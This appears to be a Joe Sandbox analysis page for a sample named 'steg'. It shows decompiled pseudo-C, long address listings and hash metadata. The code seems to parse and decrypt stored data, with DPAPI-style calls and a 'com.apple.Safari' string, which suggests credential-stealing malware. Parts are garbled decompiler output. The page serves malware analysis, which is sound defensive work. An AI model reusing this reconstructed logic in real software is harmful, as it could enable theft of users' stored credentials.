										if( *((intOrPtr*)( *_t260 + 0x3c))() >= 0) {
											while(1) {
												L23:
												_t137 = _v6280;
												if(_t137 == 0) {
													goto L9;
												}
												_t254 =  &_v6260;
												_t138 =  *((intOrPtr*)( *_t137 + 0xc))(_t137, 1,  &_v6260, 0);
												if(_t138 != 0) {
													L19:
													_t139 = _v6280;
													_v8 = 1;
													if(_t139 != 0) {
														 *((intOrPtr*)( *_t139 + 8))(_t139);
													}
													_t127 = _v6268;
													if(_t127 != 0) {
														goto L15;
													} else {
														goto L9;
													}
												}
												_t260 = _v6264;
												_v8 = 3;
												_v6272 = _t138;
												if(_t260 == 0) {
													goto L9;
												}
												_push( &_v6272);
												_push(0);
												_push( &_v6260);
												_push( &_v6244);
												_push(0);
												_push(_t260);
												if( *((intOrPtr*)( *_t260 + 0x54))() >= 0) {
													while(1) {
														L31:
														_t143 = _v6272;
														if(_t143 == 0) {
															goto L9;
														}
														_push(0);
														_t254 =  &_v6284;
														_push( &_v6284);
														_push(1);
														_push(_t143);
														if( *((intOrPtr*)( *_t143 + 0xc))() != 0) {
															L28:
															_t145 = _v6272;
															_v8 = 2;
															if(_t145 != 0) {
																 *((intOrPtr*)( *_t145 + 8))(_t145);
															}
															goto L23;
														}
														E00FE7C87( &_v1108, _t144, 0x400);
														E00FE7C87( &_v2132, 0, 0x400);
														E00FE7C87( &_v4180, 0, 0x400);
														E00FE7C87( &_v3156, 0, 0x400);
														swprintf( &_v1108, 0x400, 0x470548, _v6284);
														E00FE7AF9( &_v6228, 0x400,  &_v1108);
														E00FE8317( &_v6228, 0x400);
														_t260 = _v6264;
														_t264 = _t264 + 0x54;
														_v6288 = 0;
														_v6276 = 0;
														if(_t260 == 0) {
															goto L9;
														}
														_push(0);
														_push(0);
														_push( &_v6276);
														_push( &_v6288);
														_push(_v6284);
														_push( &_v6260);
														_push( &_v6244);
														_push(0);
														_push(_t260);
														if( *((intOrPtr*)( *_t260 + 0x44))() >= 0) {
															_t164 =  *0x4700f8(_v6276);
															_t258 = _v6288;
															_t67 = _t258 - 1; // -1
															if(_t164 >= _t67) {
																swprintf( &_v2132, 0x400, 0x470310, _v6276);
																_t264 = _t264 + 0x10;
																L44:
																_t168 =  *_t225( &_v5204, 0x47054c);
																if(_t168 == 0) {
																	_v3156 = _t168;
																	_t260 = E00FE8487( &_v2132, 0x470558);
																	_t270 = _t264 + 8;
																	if(_t260 != 0) {
																		_t79 = _t260 + 1; // 0x1
																		E00FE7AF9( &_v3156, 0x400, _t79);
																		 *_t260 = 0;
																		E00FE7AF9( &_v4180, 0x400,  &_v2132);
																		_t270 = _t270 + 0x18;
																	}
																	E00F8EF07(4,  &_v1108,  &_v4180,  &_v3156);
																	_t264 = _t270 + 0x10;
																}
																_push(0x47055c);
																_push( &_v5204);
																if( *_t225() != 0) {
																	continue;
																} else {
																	_t172 = E00FE8487( &_v1108, 0x470568);
																	_t264 = _t264 + 8;
																	if(_t172 != 0) {
																		continue;
																	}
																	_t174 = E00FE8487( &_v1108, 0x470574);
																	_t267 = _t264 + 8;
																	if(_t174 != 0) {
																		_t200 = E00FE8487( &_v1108, 0x470574);
																		_t267 = _t267 + 8;
																		 *_t200 = 0;
																	}
																	 *0x4700fc( &_v84,  &_v1108, 8);
																	_t179 = E00FE8487( &_v84, 0x47057c);
																	_t268 = _t267 + 8;
																	if(_t179 != 0) {
																		L54:
																		_t258 =  &_v2132;
																		_t260 = E00FE71C7(_t258, 0x2c);
																		_t264 = _t268 + 8;
																		if(_t260 == 0) {
																			continue;
																		} else {
																			goto L55;
																		}
																		while(1) {
																			L55:
																			 *_t260 = 0;
																			E00FE7AF9( &_v4180, 0x400, _t258);
																			_t96 = _t260 + 1; // 0x1
																			_t226 = _t96;
																			_t258 = E00FE71C7(_t96, 0x2c);
																			_t269 = _t264 + 0x14;
																			if(_t258 == 0) {
																				break;
																			}
																			 *_t258 = 0;
																			E00FE7AF9( &_v3156, 0x400, _t226);
																			E00F8EF07(4,  &_v1108,  &_v4180,  &_v3156);
																			_t258 = _t258 + 1;
																			_t260 = E00FE71C7(_t258, 0x2c);
																			_t264 = _t269 + 0x24;
																			if(_t260 != 0) {
																				continue;
																			}
																			L30:
																			_t225 =  *0x470100;
																			goto L31;
																		}
																		_t260 = _t260 + 1;
																		E00FE7AF9( &_v3156, 0x400, _t260);
																		E00F8EF07(4,  &_v1108,  &_v4180,  &_v3156);
																		_t264 = _t269 + 0x1c;
																		goto L30;
																	} else {
																		_t198 = E00FE8487( &_v84, 0x470584);
																		_t264 = _t268 + 8;
																		if(_t198 == 0) {
																			continue;
																		}
																		goto L54;
																	}
																}
															}
															_t262 = 0;
															_t254 = 0;
															if(_t258 == 0) {
																L41:
																_t260 = _t262 - 1;
																if(_t260 >= 0x400) {
																	E00FE7EEC();
																	goto L60;
																}
																 *((char*)(_t263 + _t260 - 0x850)) = 0;
																goto L44;
															}
															_t227 = _v6276;
															do {
																_t213 =  *((intOrPtr*)(_t254 + _t227));
																_t252 =  ==  ? 0x2c : _t213 & 0x000000ff;
																 *((char*)(_t263 + _t262 - 0x850)) =  ==  ? 0x2c : _t213 & 0x000000ff;
																_t254 = _t254 + 2;
																_t262 = _t262 + 1;
															} while (_t254 < _t258);
															_t225 =  *0x470100;
															goto L41;
														}
														E00FFA2A7( &_v6244, _t163, _t260, 0x470300);
													}
													goto L9;
												}
												E00FFA2A7( &_v6244, _t142, _t260, 0x470300);
												goto L28;
											}
											goto L9;
										}
										E00FFA2A7( &_v6244, _t136, _t260, 0x470300);
										goto L19;
									}
									L60:
									_t130 = _v6268;
									_v8 = 0;
									if(_t130 != 0) {
										L12:
										 *((intOrPtr*)( *_t130 + 8))(_t130);
									}
									L61:
									_t123 = _v6264;
									_v8 = 0xffffffff;
									if(_t123 != 0) {
										_t123 =  *((intOrPtr*)( *_t123 + 8))(_t123);
									}
									 *[fs:0x0] = _v16;
									_pop(_t257);
									_pop(_t261);
									_pop(_t224);
									return E00FE72F2(_t123, _t224, _v20 ^ _t263, _t254, _t257, _t261);
								}
								E00FFA2A7( &_v6268, _t126, _t258, 0x470300);
								 *0x470114(_t260);
								_t130 = _v6268;
								_v8 = 0;
								if(_t130 == 0) {
									goto L61;
								}
								goto L12;
							}
							L9:
							E00FFA287(0x80004003);
							goto L10;
						}
					}
					 *0x470124();
					goto L4;
				}
				 *0x470124();
				goto L61;
			}





























































                                                                                                                    0x00f8df3d
                                                                                                                    0x00f8df47
                                                                                                                    0x00f8df49
                                                                                                                    0x00f8df53
                                                                                                                    0x00f8df59
                                                                                                                    0x00f8df68
                                                                                                                    0x00f8df75
                                                                                                                    0x00f8df79
                                                                                                                    0x00f8df92
                                                                                                                    0x00f8df96
                                                                                                                    0x00f8dfaa
                                                                                                                    0x00f8dfb2
                                                                                                                    0x00f8dfb7
                                                                                                                    0x00f8dfb7
                                                                                                                    0x00f8dfba
                                                                                                                    0x00f8dfbc
                                                                                                                    0x00f8dfbe
                                                                                                                    0x00f8dfc6
                                                                                                                    0x00f8dfc7
                                                                                                                    0x00f8dfd5
                                                                                                                    0x00f8df9e
                                                                                                                    0x00f8df9f
                                                                                                                    0x00000000
                                                                                                                    0x00f8dfd7
                                                                                                                    0x00f8dfd7
                                                                                                                    0x00f8dfdd
                                                                                                                    0x00f8dfe1
                                                                                                                    0x00f8dfed
                                                                                                                    0x00f8dff9
                                                                                                                    0x00f8e001
                                                                                                                    0x00f8e002
                                                                                                                    0x00f8e004
                                                                                                                    0x00f8e006
                                                                                                                    0x00f8e00c
                                                                                                                    0x00f8e03e
                                                                                                                    0x00f8e046
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e048
                                                                                                                    0x00f8e057
                                                                                                                    0x00f8e057
                                                                                                                    0x00f8e059
                                                                                                                    0x00f8e05b
                                                                                                                    0x00f8e061
                                                                                                                    0x00f8e062
                                                                                                                    0x00f8e064
                                                                                                                    0x00f8e06a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e070
                                                                                                                    0x00f8e082
                                                                                                                    0x00f8e086
                                                                                                                    0x00f8e08e
                                                                                                                    0x00f8e09f
                                                                                                                    0x00f8e0a4
                                                                                                                    0x00f8e0a7
                                                                                                                    0x00f8e0ad
                                                                                                                    0x00f8e0b1
                                                                                                                    0x00f8e0bd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e0cb
                                                                                                                    0x00f8e0cc
                                                                                                                    0x00f8e0d4
                                                                                                                    0x00f8e0d5
                                                                                                                    0x00f8e0d7
                                                                                                                    0x00f8e0dd
                                                                                                                    0x00f8e117
                                                                                                                    0x00f8e117
                                                                                                                    0x00f8e117
                                                                                                                    0x00f8e11f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e129
                                                                                                                    0x00f8e133
                                                                                                                    0x00f8e138
                                                                                                                    0x00f8e0eb
                                                                                                                    0x00f8e0eb
                                                                                                                    0x00f8e0f1
                                                                                                                    0x00f8e0f7
                                                                                                                    0x00f8e0fc
                                                                                                                    0x00f8e0fc
                                                                                                                    0x00f8e0ff
                                                                                                                    0x00f8e107
                                                                                                                    0x00000000
                                                                                                                    0x00f8e10d
                                                                                                                    0x00000000
                                                                                                                    0x00f8e10d
                                                                                                                    0x00f8e107
                                                                                                                    0x00f8e13a
                                                                                                                    0x00f8e140
                                                                                                                    0x00f8e144
                                                                                                                    0x00f8e14c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e15a
                                                                                                                    0x00f8e15b
                                                                                                                    0x00f8e163
                                                                                                                    0x00f8e16a
                                                                                                                    0x00f8e16b
                                                                                                                    0x00f8e16d
                                                                                                                    0x00f8e173
                                                                                                                    0x00f8e1a7
                                                                                                                    0x00f8e1a7
                                                                                                                    0x00f8e1a7
                                                                                                                    0x00f8e1af
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e1b7
                                                                                                                    0x00f8e1b9
                                                                                                                    0x00f8e1bf
                                                                                                                    0x00f8e1c0
                                                                                                                    0x00f8e1c2
                                                                                                                    0x00f8e1c8
                                                                                                                    0x00f8e181
                                                                                                                    0x00f8e181
                                                                                                                    0x00f8e187
                                                                                                                    0x00f8e18d
                                                                                                                    0x00f8e192
                                                                                                                    0x00f8e192
                                                                                                                    0x00000000
                                                                                                                    0x00f8e18d
                                                                                                                    0x00f8e1d7
                                                                                                                    0x00f8e1ea
                                                                                                                    0x00f8e1fd
                                                                                                                    0x00f8e210
                                                                                                                    0x00f8e22c
                                                                                                                    0x00f8e247
                                                                                                                    0x00f8e258
                                                                                                                    0x00f8e25d
                                                                                                                    0x00f8e263
                                                                                                                    0x00f8e266
                                                                                                                    0x00f8e270
                                                                                                                    0x00f8e27c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e284
                                                                                                                    0x00f8e286
                                                                                                                    0x00f8e28e
                                                                                                                    0x00f8e295
                                                                                                                    0x00f8e296
                                                                                                                    0x00f8e2a2
                                                                                                                    0x00f8e2a9
                                                                                                                    0x00f8e2aa
                                                                                                                    0x00f8e2ac
                                                                                                                    0x00f8e2b2
                                                                                                                    0x00f8e2cb
                                                                                                                    0x00f8e2d1
                                                                                                                    0x00f8e2d7
                                                                                                                    0x00f8e2dc
                                                                                                                    0x00f8e33f
                                                                                                                    0x00f8e344
                                                                                                                    0x00f8e347
                                                                                                                    0x00f8e353
                                                                                                                    0x00f8e357
                                                                                                                    0x00f8e359
                                                                                                                    0x00f8e370
                                                                                                                    0x00f8e372
                                                                                                                    0x00f8e377
                                                                                                                    0x00f8e379
                                                                                                                    0x00f8e389
                                                                                                                    0x00f8e3a1
                                                                                                                    0x00f8e3a4
                                                                                                                    0x00f8e3a9
                                                                                                                    0x00f8e3a9
                                                                                                                    0x00f8e3c3
                                                                                                                    0x00f8e3c8
                                                                                                                    0x00f8e3c8
                                                                                                                    0x00f8e3cb
                                                                                                                    0x00f8e3d6
                                                                                                                    0x00f8e3db
                                                                                                                    0x00000000
                                                                                                                    0x00f8e3e1
                                                                                                                    0x00f8e3ed
                                                                                                                    0x00f8e3f2
                                                                                                                    0x00f8e3f7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e409
                                                                                                                    0x00f8e40e
                                                                                                                    0x00f8e413
                                                                                                                    0x00f8e421
                                                                                                                    0x00f8e426
                                                                                                                    0x00f8e429
                                                                                                                    0x00f8e429
                                                                                                                    0x00f8e439
                                                                                                                    0x00f8e448
                                                                                                                    0x00f8e44d
                                                                                                                    0x00f8e452
                                                                                                                    0x00f8e46d
                                                                                                                    0x00f8e46d
                                                                                                                    0x00f8e47d
                                                                                                                    0x00f8e47f
                                                                                                                    0x00f8e484
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e48a
                                                                                                                    0x00f8e48a
                                                                                                                    0x00f8e497
                                                                                                                    0x00f8e49a
                                                                                                                    0x00f8e49f
                                                                                                                    0x00f8e49f
                                                                                                                    0x00f8e4aa
                                                                                                                    0x00f8e4ac
                                                                                                                    0x00f8e4b7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e4c0
                                                                                                                    0x00f8e4c3
                                                                                                                    0x00f8e4df
                                                                                                                    0x00f8e4e4
                                                                                                                    0x00f8e4ed
                                                                                                                    0x00f8e4ef
                                                                                                                    0x00f8e4f4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e197
                                                                                                                    0x00f8e197
                                                                                                                    0x00000000
                                                                                                                    0x00f8e197
                                                                                                                    0x00f8e4fb
                                                                                                                    0x00f8e503
                                                                                                                    0x00f8e51f
                                                                                                                    0x00f8e524
                                                                                                                    0x00000000
                                                                                                                    0x00f8e454
                                                                                                                    0x00f8e45d
                                                                                                                    0x00f8e462
                                                                                                                    0x00f8e467
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e467
                                                                                                                    0x00f8e452
                                                                                                                    0x00f8e3db
                                                                                                                    0x00f8e2de
                                                                                                                    0x00f8e2e0
                                                                                                                    0x00f8e2e4
                                                                                                                    0x00f8e311
                                                                                                                    0x00f8e311
                                                                                                                    0x00f8e318
                                                                                                                    0x00f8e52c
                                                                                                                    0x00000000
                                                                                                                    0x00f8e52c
                                                                                                                    0x00f8e31e
                                                                                                                    0x00000000
                                                                                                                    0x00f8e31e
                                                                                                                    0x00f8e2e6
                                                                                                                    0x00f8e2ec
                                                                                                                    0x00f8e2ec
                                                                                                                    0x00f8e2f9
                                                                                                                    0x00f8e2fc
                                                                                                                    0x00f8e303
                                                                                                                    0x00f8e306
                                                                                                                    0x00f8e307
                                                                                                                    0x00f8e30b
                                                                                                                    0x00000000
                                                                                                                    0x00f8e30b
                                                                                                                    0x00f8e2bb
                                                                                                                    0x00f8e2bb
                                                                                                                    0x00000000
                                                                                                                    0x00f8e1a7
                                                                                                                    0x00f8e17c
                                                                                                                    0x00000000
                                                                                                                    0x00f8e17c
                                                                                                                    0x00000000
                                                                                                                    0x00f8e117
                                                                                                                    0x00f8e0e6
                                                                                                                    0x00000000
                                                                                                                    0x00f8e0e6
                                                                                                                    0x00f8e531
                                                                                                                    0x00f8e531
                                                                                                                    0x00f8e537
                                                                                                                    0x00f8e53d
                                                                                                                    0x00f8e033
                                                                                                                    0x00f8e036
                                                                                                                    0x00f8e036
                                                                                                                    0x00f8e543
                                                                                                                    0x00f8e543
                                                                                                                    0x00f8e549
                                                                                                                    0x00f8e552
                                                                                                                    0x00f8e557
                                                                                                                    0x00f8e557
                                                                                                                    0x00f8e55d
                                                                                                                    0x00f8e565
                                                                                                                    0x00f8e566
                                                                                                                    0x00f8e567
                                                                                                                    0x00f8e575
                                                                                                                    0x00f8e575
                                                                                                                    0x00f8e015
                                                                                                                    0x00f8e01b
                                                                                                                    0x00f8e021
                                                                                                                    0x00f8e027
                                                                                                                    0x00f8e02d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8e02d
                                                                                                                    0x00f8dfef
                                                                                                                    0x00f8dff4
                                                                                                                    0x00000000
                                                                                                                    0x00f8dff4
                                                                                                                    0x00f8dfd5
                                                                                                                    0x00f8df98
                                                                                                                    0x00000000
                                                                                                                    0x00f8df98
                                                                                                                    0x00f8df7b
                                                                                                                    0x00000000

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f562edde0fd5280cf62fde84e1e090aed38352e4274fb389e3cfdc1516eeef1e
                                                                                                                    • Instruction ID: addc800575dfabffe123f4eb41946c67703cb9d6a33293cba1b29902ef74a270
                                                                                                                    • Opcode Fuzzy Hash: f562edde0fd5280cf62fde84e1e090aed38352e4274fb389e3cfdc1516eeef1e
                                                                                                                    • Instruction Fuzzy Hash: 03F1A371A00259ABDB20EBA0CC45FEA77BCAF04704F144199FA09E7181EBB4EB45DF64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8C197 Relevance: 23.2, APIs: 7, Strings: 6, Instructions: 410COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 63%
                                                                                                                    			E00F8C197(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v24;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v273;
				intOrPtr _v277;
				char _v278;
				short _v280;
				intOrPtr _v289;
				intOrPtr _v293;
				char _v294;
				short _v296;
				char _v304;
				char _v1328;
				char _v2352;
				char _v4400;
				char _v5552;
				char _v5680;
				char _v5808;
				char _v5809;
				char _v5816;
				char _v5820;
				intOrPtr _v5824;
				short _v5828;
				intOrPtr _v5832;
				intOrPtr _v5836;
				signed int _v5840;
				intOrPtr* _v5844;
				signed char* _v5848;
				char _v10160;
				char* _v10164;
				signed int _v10168;
				char* _v10172;
				char _v10176;
				signed char* _v10180;
				char _v10184;
				char _v10204;
				void* __ebp;
				void* _t160;
				signed int _t163;
				intOrPtr _t164;
				signed int _t168;
				signed int _t171;
				intOrPtr* _t172;
				signed char* _t180;
				signed int _t218;
				signed int _t221;
				intOrPtr* _t225;
				signed int _t227;
				signed int _t239;
				signed int _t246;
				signed int _t254;
				signed int _t256;
				void* _t260;
				intOrPtr _t264;
				signed char _t268;
				void* _t270;
				intOrPtr _t271;
				signed char* _t274;
				intOrPtr* _t286;
				signed int _t287;
				char _t289;
				void* _t301;
				signed char* _t303;
				intOrPtr* _t304;
				intOrPtr _t305;
				void* _t306;
				void* _t307;
				signed int _t309;
				signed int _t311;
				void* _t312;
				signed int _t313;
				signed int _t314;
				void* _t315;
				void* _t316;
				void* _t317;
				void* _t318;
				signed int _t320;

				_t308 = __esi;
				_t302 = __edi;
				_t298 = __edx;
				_t262 = __ebx;
				E00FE7307(0x16d4);
				_v8 =  *0x481f80 ^ _t313;
				_v5816 = 0;
				_v5820 = 0;
				_v5836 = 0xffc7d83;
				_v5832 = 0x69e8b38e;
				_v5828 = 0xaf73;
				_v5809 = 0xff;
				_t160 = E00FE928A( &_v5820, _a4, 0x470850);
				_t271 = _v5820;
				_t316 = _t315 + 0xc;
				if(_t271 == 0) {
					L30:
					__eflags = _v8 ^ _t313;
					return E00FE72F2(_t160, _t262, _v8 ^ _t313, _t298, _t302, _t308);
				} else {
					_t325 = _t160;
					if(_t160 != 0) {
						goto L30;
					} else {
						_push(__ebx);
						_push(2);
						_push(_t160);
						_push(_t271);
						E00FE97FE(__ebx, __edi, __esi, _t325);
						_push(_v5820);
						_t163 = E00FE9BD6(__ebx, __edx, __edi, __esi, _t325);
						_t263 = _t163;
						_v5840 = _t163;
						_t164 = E00FE7BCE(_t163, __edi, _t163);
						_t317 = _t316 + 0x14;
						_v5824 = _t164;
						_t326 = _t164;
						if(_t164 != 0) {
							_push(__esi);
							_push(_v5820);
							E00FE9CFF(_t263, __edi, __esi, __eflags);
							_t264 = _v5824;
							E00FE96C3(_t264, _t263, 1, _v5820);
							_push(_v5820);
							E00FE9010(_t264, __edi, __esi, __eflags);
							_t168 = _v5840;
							_t318 = _t317 + 0x18;
							_t309 = 0;
							__eflags = _t168;
							if(_t168 == 0) {
								L29:
								_t160 = E00FE8F6C(_t264);
								_pop(_t308);
								_pop(_t262);
								goto L30;
							} else {
								_push(__edi);
								while(1) {
									_t171 = E00FE7FC7(_t309 + _t264, 8, _t168 - _t309);
									_t318 = _t318 + 0xc;
									__eflags = _t171;
									if(_t171 == 0) {
										break;
									}
									_t172 = _t171 + 1;
									_t22 = _t172 - 8; // -7
									_t274 = _t22;
									_t309 = _t172 - _t264;
									_v5844 = _t172;
									_t24 = _t172 + 8; // 0x9
									_t303 = _t24;
									__eflags = _t274 - _t264;
									if(_t274 < _t264) {
										L27:
										_t168 = _v5840;
										__eflags = _t309 - _t168;
										if(_t309 < _t168) {
											continue;
										} else {
											break;
										}
									} else {
										__eflags = _t303 - _v5840 + _t264;
										if(_t303 > _v5840 + _t264) {
											goto L27;
										} else {
											_t298 = ( *_t274 & 0x000000ff) << 0x00000018 | (_t274[1] & 0x000000ff) << 0x00000010;
											_v5848 =  &(_t274[2]);
											_t180 = _v5848;
											_t268 = ( *_t303 & 0x000000ff) << 0x00000018 | (_t303[1] & 0x000000ff) << 0x00000010 | (_t303[2] & 0x000000ff) << 0x00000008 | _t303[3] & 0x000000ff;
											_t282 = ( *_t180 & 0x000000ff) << 0x00000008 | _t180[1] & 0x000000ff | ( *_t274 & 0x000000ff) << 0x00000018 | (_t274[1] & 0x000000ff) << 0x00000010;
											__eflags = (( *_t180 & 0x000000ff) << 0x00000008 | _t180[1] & 0x000000ff | ( *_t274 & 0x000000ff) << 0x00000018 | (_t274[1] & 0x000000ff) << 0x00000010) - _t268 + 0x10;
											if((( *_t180 & 0x000000ff) << 0x00000008 | _t180[1] & 0x000000ff | ( *_t274 & 0x000000ff) << 0x00000018 | (_t274[1] & 0x000000ff) << 0x00000010) != _t268 + 0x10) {
												L26:
												_t264 = _v5824;
												goto L27;
											} else {
												__eflags = _t268 - _v5840 - _t309 - 0xc;
												if(_t268 > _v5840 - _t309 - 0xc) {
													goto L26;
												} else {
													__eflags = _t268 - 8;
													if(_t268 < 8) {
														goto L26;
													} else {
														__eflags = _t268 & 0x00000007;
														if((_t268 & 0x00000007) != 0) {
															goto L26;
														} else {
															asm("movq xmm0, [ebp-0x16c8]");
															_t304 = _v5844;
															_v296 = _v5828;
															_v294 = _v5809;
															asm("movq [ebp-0x12c], xmm0");
															_v293 =  *_t304;
															_v289 =  *((intOrPtr*)(_t304 + 4));
															_push(0x10);
															E00F8BAD7(_t268,  &_v304, 0x13,  &_v32);
															asm("movq xmm0, [ebp-0x1c]");
															asm("movq [ebp-0x12c], xmm0");
															asm("movq xmm0, [ebp-0x14]");
															_v280 = _v5828;
															asm("movq [ebp-0x124], xmm0");
															asm("movq xmm0, [ebp-0x16c8]");
															_v278 = _v5809;
															asm("movq [ebp-0x11c], xmm0");
															_v277 =  *_t304;
															_v273 =  *((intOrPtr*)(_t304 + 4));
															_push(0x10);
															E00F8BAD7(_t268,  &_v304, 0x23,  &_v48);
															E00F90397(_t282,  &_v32,  &_v5680);
															E00F90397(_t282,  &_v24,  &_v5808);
															E00F90397(_t282,  &_v48,  &_v5552);
															_v16 = _v40;
															_v12 = _v36;
															_v1328 = 0;
															E00F8FB27(_t304 + 0xc,  &_v1328, _t268,  &_v5680,  &_v5808,  &_v5552,  &_v16, 0);
															_t218 = _v1328;
															_t318 = _t318 + 0x58;
															__eflags = _t218;
															if(_t218 == 0) {
																L25:
																_t309 = _t309 + _t268 + 0xc;
																__eflags = _t309;
																goto L26;
															} else {
																__eflags = _t218 - 8;
																if(_t218 == 8) {
																	goto L25;
																} else {
																	__eflags = _t313 + _t268 - 0x52d - ( *(_t313 + _t268 - 0x52d) & 0x000000ff) + 1;
																	E00FE7C87(_t313 + _t268 - 0x52d - ( *(_t313 + _t268 - 0x52d) & 0x000000ff) + 1, 0,  *(_t313 + _t268 - 0x52d) & 0x000000ff);
																	_t286 =  &_v1328;
																	_t320 = _t318 + 0xc;
																	_t301 = _t286 + 2;
																	do {
																		_t221 =  *_t286;
																		_t286 = _t286 + 2;
																		__eflags = _t221;
																	} while (_t221 != 0);
																	_t287 = _t286 - _t301;
																	__eflags = _t287;
																	 *0x470048(0, 0,  &_v1328, _t287 >> 1,  &_v2352, 0x400, 0, 0);
																	_t225 =  &_v1328;
																	_t298 = _t225 + 2;
																	do {
																		_t289 =  *_t225;
																		_t225 = _t225 + 2;
																		__eflags = _t289;
																	} while (_t289 != 0);
																	_t227 = _t225 - _t298 >> 1;
																	__eflags = _t227 - 0x400;
																	if(_t227 >= 0x400) {
																		E00FE7EEC();
																		asm("sbb al, 0x1e");
																		 *_t268 =  *_t268 + _t289;
																		_push(ds);
																		 *((intOrPtr*)(_t298 + 0x1e)) =  *((intOrPtr*)(_t298 + 0x1e)) + _t298;
																		 *((intOrPtr*)(_t309 + 0x1e)) =  *((intOrPtr*)(_t309 + 0x1e)) + _t268;
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		_push(_t313);
																		_t314 = _t320;
																		E00FE7307(0x27bc);
																		_v60 =  *0x481f80 ^ _t314;
																		_push(_t304);
																		_t305 = _v44;
																		_push(0x2710);
																		_v204 = 0xf8a8ac1d;
																		_v200 = 0x3e48b8d3;
																		_v196 = 0xa3e7d48;
																		_v192 = 0x26dd0762;
																		_v188 = 0x38167e6;
																		_v184 = 0xa513b2e7;
																		_v180 = 0x4fee79b0;
																		_v176 = 0xed15410f;
																		_v172 = 0xe58c147b;
																		_v168 = 0xc10d464b;
																		_v164 = 0xe7d6fe8e;
																		_v160 = 0x8b067527;
																		_v156 = 0xfdc0049;
																		_v152 = 0xfd9ea030;
																		_v148 = 0xc8f18509;
																		_v144 = 0x8c175aa;
																		_v140 = 0xe2017905;
																		_v136 = 0x80afd897;
																		_v132 = 0x710b6038;
																		_v128 = 0x7753680e;
																		_v124 = 0xf6610f2f;
																		_v120 = 0x5c8f8e1d;
																		_v116 = 0x74213db2;
																		_v112 = 0x6b54b40;
																		_v108 = 0xbd7aab6e;
																		_v104 = 0x327ea98b;
																		_v100 = 0x24066e8f;
																		_v96 = 0xa5a429d9;
																		_v92 = 0xfd2326be;
																		_v88 = 0xf4cf1ee;
																		_v84 = 0xfb585e74;
																		_v80 = 0x91ef7491;
																		_v76 = 0x2e6d6f63;
																		_v72 = 0x6c707061;
																		_v68 = 0x61532e65;
																		_v64 = 0x69726166;
																		_t239 = E00F8B777(_v48,  &_v10204);
																		__eflags = _t239;
																		if(_t239 == 0) {
																			L34:
																			_pop(_t306);
																			__eflags = _v16 ^ _t314;
																			return E00FE72F2(0, _t268, _v16 ^ _t314, _t298, _t306, _t309);
																		} else {
																			_v10168 = _t239;
																			_v10172 =  &_v160;
																			_v10164 =  &_v10160;
																			_v10176 = 0x90;
																			_t246 =  *0x470040( &_v10168, 0,  &_v10176, 0, 0, 0,  &_v10184);
																			__eflags = _t246;
																			if(_t246 != 0) {
																				_t311 =  *_v10180 & 0x000000ff;
																				E00FE7337(_t305,  &(_v10180[4]), _t311);
																				 *((char*)(_t305 + _t311)) = 0;
																				_t312 = _t309;
																				__eflags = _v16 ^ _t314;
																				_pop(_t307);
																				return E00FE72F2(1, _t268, _v16 ^ _t314, _t298, _t307, _t312);
																			} else {
																				 *0x470124();
																				goto L34;
																			}
																		}
																	} else {
																		 *((char*)(_t313 + _t227 - 0x92c)) = _t289;
																		_t254 = E00FE835E( &_v2352, 0x470854, 4);
																		_t318 = _t320 + 0xc;
																		__eflags = _t254;
																		if(_t254 != 0) {
																			_t256 = _v5816 - 1;
																			__eflags = _t256 - 3;
																			if(_t256 <= 3) {
																				goto ( *((intOrPtr*)(0x401ee4 + _t256 * 4)));
																			}
																			_v5816 = 0;
																		} else {
																			E00FE7AF9( &_v4400, 0x400,  &_v2352);
